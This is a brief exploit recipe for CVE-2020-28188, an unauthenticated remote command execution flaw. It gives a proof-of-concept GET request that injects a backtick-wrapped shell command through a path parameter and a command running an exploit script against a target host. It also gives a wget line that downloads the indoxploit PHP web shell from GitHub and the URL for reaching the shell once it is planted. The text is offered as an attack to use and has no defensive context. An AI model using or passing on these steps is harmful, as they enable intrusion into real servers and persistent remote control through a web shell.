Unauthenticated Remote Command Execution
CVE-2020-28188
Vulnerable page: /include/makecvs.php
Vulnerable parameter: Event
Proof of Concept:
GET /tos/index.php?explorer/pathList&path=%60touch%20/tmp/file%60 HTTP/1.1
pip install requests
python3 RCE.PY --url target.com:8181
wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php
akses shell : http://target.com/shell.php